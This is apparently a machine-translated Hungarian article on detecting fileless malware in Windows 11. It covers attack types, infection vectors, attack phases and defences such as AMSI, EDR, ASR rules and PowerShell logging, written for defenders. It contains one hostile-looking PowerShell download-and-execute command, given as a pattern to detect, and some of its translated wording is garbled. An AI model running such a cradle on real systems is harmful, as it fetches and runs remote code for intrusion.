Veszélyes, fájl nélküli kártevők észlelése Windows 11 rendszerben

¿Hogyan lehet felismerni a veszélyes, fájl nélküli kártevőket? A fájl nélküli támadások aktivitása jelentősen megnőtt, és ami még rosszabbá teszi a helyzetet, A Windows 11 nem immunisEz a megközelítés megkerüli a lemezt, és a memóriára, valamint a legitim rendszereszközökre támaszkodik; ezért küzdenek az aláírás-alapú víruskereső programok. Ha megbízható módszert keres a felderítésére, a válasz a következők kombinálásában rejlik: telemetria, viselkedéselemzés és Windows-vezérlők.

A jelenlegi ökoszisztémában a PowerShell-t, a WMI-t vagy az Mshta-t visszaélő kampányok kifinomultabb technikákkal léteznek, mint például a memória-injekciók, a lemez „érintés nélküli” megőrzése, sőt még a ... firmware-visszaélésekA kulcs a fenyegetési térkép, a támadási fázisok és a jelek megértése, még akkor is, ha minden a RAM-on belül történik.

Mi a fájl nélküli kártevő, és miért jelent problémát a Windows 11 rendszerben?

Amikor „fájl nélküli” fenyegetésekről beszélünk, olyan rosszindulatú kódra gondolunk, amely Nem kell új futtatható fájlokat letétbe helyezned. a fájlrendszerben a működéshez. Általában futó folyamatokba injektálják és a RAM-ban hajtják végre, a Microsoft által aláírt interpreterek és bináris fájlok segítségével (pl. PowerShell, WMI, rundll32, mshtaEz csökkenti a számítógép terhelését, és lehetővé teszi, hogy megkerülje azokat a motorokat, amelyek csak gyanús fájlokat keresnek.

Még a parancsok indításához sebezhetőségeket kihasználó irodai dokumentumokat vagy PDF-eket is a jelenség részének tekintik, mert végrehajtás aktiválása a memóriában anélkül, hogy hasznos bináris fájlokat hagyna hátra elemzésre. makrók és DDE Az Office-ban, mivel a kód legitim folyamatokban, például a WinWordban fut.

A támadók a társadalmi manipulációt (adathalászat, spam linkek) technikai csapdákkal kombinálják: a felhasználó kattintása egy láncot indít el, amelyben egy szkript letölti és végrehajtja a memóriában lévő végső hasznos adatot, elkerülve a nyomok hátrahagyását a lemezen. A célok az adatlopástól a zsarolóvírusok végrehajtásán át a csendes oldalirányú mozgásig terjednek.

Tipológiák a rendszerben elfoglalt helyük szerint: a „tiszta”-tól a hibridekig

A fogalmak félreértésének elkerülése érdekében hasznos a fenyegetéseket a fájlrendszerrel való interakciójuk mértéke szerint elkülöníteni. Ez a kategorizálás tisztázza a következőket: mi marad meg, hol él a kód, és milyen jeleket hagy maga után?.

I. típus: nincs fájlaktivitás

A teljesen fájlmentes kártevő semmit sem ír a lemezre. Klasszikus példa erre egy hálózati sebezhetőség (mint régen az EternalBlue vektor) egy, a kernel memóriájában elhelyezkedő hátsó ajtó megvalósításához (például DoublePulsar esetén). Itt minden a RAM-ban történik, és nincsenek műtermékek a fájlrendszerben.

Egy másik lehetőség a szennyeződés firmware komponensek: BIOS/UEFI, hálózati adapterek, USB perifériák (BadUSB-típusú technikák) vagy akár CPU alrendszerek. Újraindítások és újratelepítések során is megmaradnak, azzal a további nehézséggel, hogy Kevés termék ellenőrzi a firmware-tEzek összetett támadások, ritkábbak, de lopakodásuk és tartósságuk miatt veszélyesek.

II. típus: Közvetett archiválási tevékenység

Itt a kártevő nem „hagyja el” a saját futtatható fájlját, hanem rendszer által kezelt konténereket használ, amelyek lényegében fájlokként tárolódnak. Például hátsó ajtók, amelyek… PowerShell-parancsok a WMI adattárban, és eseményszűrőkkel indíthatja el a végrehajtását. Lehetséges a parancssorból telepíteni bináris fájlok törlése nélkül, de a WMI adattár a lemezen található legitim adatbázisként, ami megnehezíti a rendszer befolyásolása nélküli tisztítását.

Gyakorlati szempontból fájl nélkülinek tekintik őket, mivel az a konténer (WMI, beállításjegyzék stb.) Ez nem egy klasszikus, detektálható futtatható fájl És a tisztítása sem triviális. Az eredmény: lopakodó kitartás, kevés "hagyományos" nyomokkal.

III. típus: Fájlok szükségesek a működéshez

Néhány esetben fenntartják a „fájl nélküli” perzisztencia Logikai szinten szükségük van egy fájl alapú triggerre. Erre tipikus példa a Kovter: egy shell parancsfájlt regisztrál egy véletlenszerű kiterjesztésekhez; amikor egy ilyen kiterjesztésű fájlt megnyitnak, egy kis szkript indul el az mshta.exe használatával, amely rekonstruálja a rosszindulatú karakterláncot a beállításjegyzékből.

A trükk az, hogy ezek a véletlenszerű kiterjesztésű „csali” fájlok nem tartalmaznak elemezhető hasznos adatot, és a kód nagy része a Rekord (egy másik konténer). Ezért vannak fájl nélküli kategóriába sorolva hatásuk szempontjából, annak ellenére, hogy szigorúan véve egy vagy több lemezes műterméktől függenek triggerként.

A fertőzés vektorai és „gazdaszervezetei”: hol jut be és hol rejtőzik el

A felismerés javítása érdekében létfontosságú a fertőzés bejutási pontjának és gazdaszervezetének feltérképezése. Ez a perspektíva segít a tervezésben speciális vezérlők Priorizálja a megfelelő telemetriát.

Kizsákmányolások

• Fájl alapú (III. típus): Dokumentumok, futtatható fájlok, korábbi Flash/Java fájlok vagy LNK fájlok kihasználhatják a böngésző vagy az azokat feldolgozó motor hibáit, hogy shellkódot töltsenek be a memóriába. Az első vektor egy fájl, de a hasznos adat a RAM-ba kerül.
• Hálózatalapú (I. típus): Egy sebezhetőséget kihasználó csomag (pl. az SMB-ben) végrehajtást ér el a felhasználói területen vagy a kernelben. A WannaCry tette népszerűvé ezt a megközelítést. Közvetlen memória betöltés új fájl nélkül.

Hardver

• Eszközök (I. típus): A lemez vagy hálózati kártya firmware-je módosítható és kód beilleszthető. Nehéz ellenőrizni és az operációs rendszeren kívül is megmarad.
• CPU és felügyeleti alrendszerek (I. típus): Az olyan technológiák, mint az Intel ME/AMT-je, utat mutattak a ... felé Hálózatépítés és végrehajtás az operációs rendszeren kívülNagyon alacsony szinten támad, nagy potenciállal a lopakodásra.
• USB (I. típus): A BadUSB lehetővé teszi egy USB-meghajtó átprogramozását, hogy billentyűzetet vagy hálózati kártyát utánozzon, és parancsokat indítson, vagy átirányítsa a forgalmat.
• BIOS/UEFI (I. típus): rosszindulatú firmware-átprogramozás (például a Mebromi esetében), amely a Windows indulása előtt fut.
• Hipervizor (I. típus): Egy mini-hipervizor implementálása az operációs rendszer alá annak jelenlétének elrejtésére. Ritka, de már megfigyelték hipervizor rootkitek formájában.

Végrehajtás és injekció

• Fájl alapú (III. típus): EXE/DLL/LNK vagy ütemezett feladatok, amelyek injekciókat indítanak legitim folyamatokba.
• Makrók (III. típus): Az Office VBA-ja a felhasználó beleegyezésével, megtévesztés útján képes dekódolni és végrehajtani a hasznos adatokat, beleértve a teljes zsarolóvírusokat is.
• Szkriptek (II. típus): PowerShell, VBScript vagy JScript fájlból, parancssorból, szolgáltatások, regisztráció vagy WMIA támadó távoli munkamenetben begépelheti a szkriptet anélkül, hogy a lemezhez hozzáérne.
• Rendszerindítási rekord (MBR/Boot) (II. típus): Az olyan családok, mint a Petya, felülírják a rendszerindító szektort, hogy átvegyék az irányítást indításkor. Ez a fájlrendszeren kívül esik, de az operációs rendszer és a modern megoldások számára hozzáférhető, amelyekkel vissza lehet állítani.

Hogyan működnek a fájl nélküli támadások: fázisok és jelek

Bár nem hagynak futtatható fájlokat, a kampányok szakaszos logikát követnek. Megértésük lehetővé teszi a monitorozást. események és folyamatok közötti kapcsolatok amik nyomot hagynak.

• Kezdeti hozzáférésAdathalász támadások linkek vagy mellékletek, feltört webhelyek vagy ellopott hitelesítő adatok használatával. Sok láncolat egy Office-dokumentummal kezdődik, amely egy parancsot indít el. PowerShell.
• Kitartás: hátsó ajtók WMI-n keresztül (szűrők és előfizetések), Regisztrációs végrehajtási kulcsok vagy ütemezett feladatok, amelyek új rosszindulatú fájl létrehozása nélkül indítják újra a szkripteket.
• KiszivárgásMiután az információkat összegyűjtötték, megbízható folyamatok (böngészők, PowerShell, bitsadmin) segítségével küldik ki a hálózatból a forgalom keverése érdekében.

Ez a minta különösen alattomos, mert a támadásjelzők A normalitás homályába bújnak: parancssori argumentumok, folyamatláncolás, rendellenes kimenő kapcsolatok vagy hozzáférés az injektálási API-khoz.

Gyakori technikák: az emlékezettől a rögzítésig

A színészek számos lehetőségre támaszkodnak mód amelyek optimalizálják a lopakodást. Hasznos ismerni a leggyakoribbakat a hatékony észlelés aktiválásához.

• Az emlékezetben lakó: Hasznos adatok betöltése egy megbízható folyamat területére, amely aktiválásra vár. rootkitek és hookok A kernelben emelik az elrejtés szintjét.
• Megmaradás a nyilvántartásbanMentse el a titkosított blobokat kulcsokban, és rehidratálja őket egy legitim indítóból (mshta, rundll32, wscript). Az efemer telepítő képes önmegsemmisítésre a lábnyomának minimalizálása érdekében.
• Hitelesítő adatok adathalászataLopott felhasználónevek és jelszavak használatával a támadó távoli parancsértelmezőket futtat és telepít csendes hozzáférés a beállításjegyzékben vagy a WMI-ben.
• „Fájl nélküli” zsarolóvírusA titkosítás és a C2 kommunikáció a RAM-ból vezérelt, így csökken a felderítés esélye, amíg a kár láthatóvá nem válik.
• Üzemeltető készletek: automatizált láncok, amelyek sebezhetőségeket észlelnek, és a felhasználó kattintása után csak memóriát használó hasznos adatokat telepítenek.
• Kódot tartalmazó dokumentumokmakrók és mechanizmusok, mint például a DDE, amelyek parancsokat indítanak el a végrehajtható fájlok lemezre mentése nélkül.

Az iparági tanulmányok már jelentős csúcsokat mutattak ki: 2018 egyik időszakában egy több mint 90%-os növekedés szkriptalapú és PowerShell-lánctámadásokban annak a jele, hogy a vektort hatékonysága miatt részesítik előnyben.

A vállalatok és beszállítók előtt álló kihívás: miért nem elég a blokkolás?

Csábító lenne letiltani a PowerShellt vagy véglegesen betiltani a makrókat, de Megszakítanád a műveletetA PowerShell a modern adminisztráció egyik pillére, az Office pedig elengedhetetlen az üzleti életben; vakon blokkolása gyakran nem kivitelezhető.

Továbbá vannak módszerek az alapvető vezérlők megkerülésére: PowerShell futtatása DLL-eken és rundll32-n keresztül, szkriptek becsomagolása EXE fájlokba, Hozd magaddal a PowerShell saját példányát vagy akár szkripteket rejthetnek el képekben, és kinyerhetik azokat a memóriába. Ezért a védekezés nem alapozható pusztán az eszközök létezésének tagadására.

Egy másik gyakori hiba a teljes döntéshozatal felhőre delegálása: ha az ügynöknek várnia kell a szerver válaszára, Elveszíti a valós idejű megelőzéstA telemetriai adatok feltölthetők az információk gazdagítása érdekében, de a A mérséklésnek a végponton kell történnie.

Fájl nélküli kártevők észlelése Windows 11 rendszerben: telemetria és viselkedés

A nyerő stratégia az folyamatok és memória monitorozásaNem fájlok. A rosszindulatú viselkedések stabilabbak, mint a fájlok formája, így ideálisak a megelőző motorok számára.

• AMSI (kártevőirtó vizsgálati felület)Elfogja a PowerShell, VBScript vagy JScript szkripteket, még akkor is, ha azok dinamikusan vannak létrehozva a memóriában. Kiválóan alkalmas a kódolt karakterláncok rögzítésére a végrehajtás előtt.
• Folyamatfelügyelet: rajt/cél, PID, szülők és gyermekek, útvonalak, parancssorokat és hasheket, valamint végrehajtási fákat a teljes történet megértéséhez.
• Memóriaelemzés: befecskendezések, reflexiós vagy PE terhelések érzékelése a lemez érintése nélkül, valamint a szokatlan végrehajtható régiók áttekintése.
• Indító szektor védelem: az MBR/EFI ellenőrzése és helyreállítása manipuláció esetén.

A Microsoft ökoszisztémájában a Defender for Endpoint ötvözi az AMSI-t, viselkedésfigyelésA memória-szkennelést és a felhőalapú gépi tanulást az új vagy obfuszkált variánsok észlelésének skálázására használják. Más gyártók hasonló megközelítéseket alkalmaznak a kernelben lévő motorokkal.

A korreláció reális példája: a dokumentumtól a PowerShellig

Képzelj el egy láncot, ahol az Outlook letölt egy mellékletet, a Word megnyitja a dokumentumot, engedélyezi az aktív tartalmat, és a PowerShell gyanús paraméterekkel indul el. A megfelelő telemetria kimutatná a... parancssor (pl. ExecutionPolicy Bypass, rejtett ablak), nem megbízható tartományhoz való csatlakozás és egy olyan gyermekfolyamat létrehozása, amely telepíti magát az AppData mappába.

Egy lokális kontextusú ágens képes arra, hogy megáll és hátrafelé rosszindulatú tevékenység manuális beavatkozás nélkül, a SIEM értesítése vagy e-mail/SMS útján történő értesítés mellett. Egyes termékek egy kiváltó ok attribúciós réteget is hozzáadnak (StoryLine típusú modellek), amely nem a látható folyamatra (Outlook/Word), hanem a teljes rosszindulatú szál és eredetét a rendszer átfogó megtisztítására.

Egy tipikus parancsminta, amire érdemes figyelni, így nézhet ki: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');A logika nem a pontos karakterlánc, de a jelek halmaza: szabályzat megkerülése, rejtett ablak, letöltés törlése és memórián belüli végrehajtás.

AMSI, folyamat és az egyes szereplők szerepe: a végponttól a SOC-ig

A szkriptek rögzítésén túl egy robusztus architektúra olyan lépéseket szervez, amelyek megkönnyítik a kivizsgálást és a reagálást. Minél több bizonyíték van a terhelés végrehajtása előtt, annál jobb., jobb.

• Szkript lehallgatásaAz AMSI statikus és dinamikus elemzésre továbbítja a tartalmat (még akkor is, ha menet közben generálódik) egy kártevő-folyamatban.
• Folyamat eseményekPID-ket, bináris fájlokat, hash-eket, útvonalakat és egyéb adatokat gyűjtenek. érvek, létrehozva a végső betöltéshez vezető folyamatfákat.
• Észlelés és jelentéskészítésAz észlelések a termékkonzolon jelennek meg, és továbbításra kerülnek hálózati platformokra (NDR) kampányvizualizáció céljából.
• Felhasználói garanciákMég ha egy szkriptet be is fecskendeznek a memóriába, a keretrendszer Az AMSI elfogja a Windows kompatibilis verzióiban.
• Adminisztrátori jogosultságok: szkriptvizsgálat engedélyezésére szolgáló házirend-konfiguráció, viselkedésalapú blokkolás és jelentések létrehozása a konzolról.
• SOC munka: az összetevők kinyerése (virtuális gép UUID-ja, operációs rendszer verziója, szkript típusa, kezdeményező folyamat és annak szülője, hash-ek és parancssorok) az előzmények újraalkotása érdekében, és emelési szabályok jövőbeli.

Amikor a platform lehetővé teszi az exportálást memóriapuffer A végrehajtással összefüggésben a kutatók új észleléseket generálhatnak és gazdagíthatják a hasonló variánsok elleni védelmet.

Gyakorlati intézkedések a Windows 11-ben: megelőzés és vadászat

Az EDR memória-vizsgálattal és AMSI-vel való ellátása mellett a Windows 11 lehetővé teszi a támadási zónák bezárását és a láthatóság javítását a következőkkel: natív vezérlők.

• Regisztráció és korlátozások a PowerShellbenEngedélyezi a szkriptblokk-naplózást és a modulnaplózást, korlátozott módokat alkalmaz, ahol lehetséges, és szabályozza a következők használatát: Megkerülő/Rejtett.
• Támadási felület csökkentésére (ASR) vonatkozó szabályok: blokkolja az Office-folyamatok általi szkriptindításokat és WMI-visszaélés/PSExec, amikor nincs rá szükség.
• Office makróházirendek: alapértelmezés szerint letiltja a belső makróaláírást és a szigorú megbízhatósági listákat; figyeli a régi DDE-folyamatokat.
• WMI audit és nyilvántartás: figyeli az esemény-előfizetéseket és az automatikus végrehajtási kulcsokat (Run, RunOnce, Winlogon), valamint a feladatok létrehozását Ütemezett.
• Indításvédelem: aktiválja a Secure Boot funkciót, ellenőrzi az MBR/EFI integritását, és ellenőrzi, hogy indításkor nincsenek-e módosítások.
• Foltozás és keményítés: bezárja a böngészőkben, az Office-összetevőkben és a hálózati szolgáltatásokban található kihasználható sebezhetőségeket.
• Tudatosság: felhasználókat és technikai csapatokat képez ki az adathalászat és a támadások jelzéseinek terén titkos kivégzések.

A keresés során a következőkre kell összpontosítani: folyamatok létrehozása Office által a PowerShell/MSHTA felé, argumentumok a letöltési karakterlánc/letöltési fájlEgyértelmű obfuszkációval, reflektív injekciókkal és gyanús TLD-kre irányuló kimenő hálózatokkal rendelkező szkriptek. A zaj csökkentése érdekében hasonlítsa össze ezeket a jeleket a reputációval és a gyakorisággal.

Mit képesek ma érzékelni az egyes motorok?

A Microsoft vállalati megoldásai ötvözik az AMSI-t, a viselkedéselemzést, vizsgálja meg az emlékezetet és a rendszerindító szektor védelme, valamint felhőalapú gépi tanulási modellek a felmerülő fenyegetések elleni skálázáshoz. Más gyártók kernelszintű monitorozást alkalmaznak a rosszindulatú és a jóindulatú szoftverek megkülönböztetésére a változtatások automatikus visszavonásával.

Egy megközelítés, amely azon alapul kivégzési történetek Lehetővé teszi a kiváltó ok azonosítását (például egy Outlook-melléklet, amely elindít egy láncot), és a teljes fa enyhítését: szkriptek, kulcsok, feladatok és köztes bináris fájlok, elkerülve a látható tünetnél való elakadást.

Gyakori hibák és azok elkerülése

A PowerShell blokkolása alternatív kezelési terv nélkül nemcsak nem praktikus, de vannak további veszélyei is. közvetett módon történő előhívásának módjaiUgyanez vonatkozik a makrókra is: vagy szabályzatokkal és aláírásokkal kezeled őket, vagy a vállalkozás fog kárt szenvedni. Jobb, ha a telemetriára és a viselkedési szabályokra koncentrálsz.

Egy másik gyakori tévedés az, hogy azt hisszük, hogy az alkalmazások fehérlistázása mindent megold: a fájl nélküli technológia pontosan erre épül. megbízható alkalmazásokA kontrollnak azt kellene megfigyelnie, hogy mit csinálnak és hogyan viszonyulnak egymáshoz, nem csak azt, hogy szabad-e nekik valamit.

A fentiek mindegyikével a fájl nélküli kártevő megszűnik „szellemként” működni, ha azt figyeljük meg, ami igazán számít: viselkedés, memória és eredet minden egyes végrehajtás során. Az AMSI, a gazdag folyamattelemetria, a natív Windows 11 vezérlők és az EDR réteg viselkedéselemzéssel kombinálva előnyt biztosít. Ehhez adjuk hozzá a makrókhoz és a PowerShellhez való realisztikus szabályzatokat, a WMI/beállításjegyzék-naplózást, valamint a parancssorokat és folyamatfákat rangsoroló vadászatot, és máris olyan védelmet kapunk, amely elvágja ezeket a láncokat, mielőtt azok hangot adnának.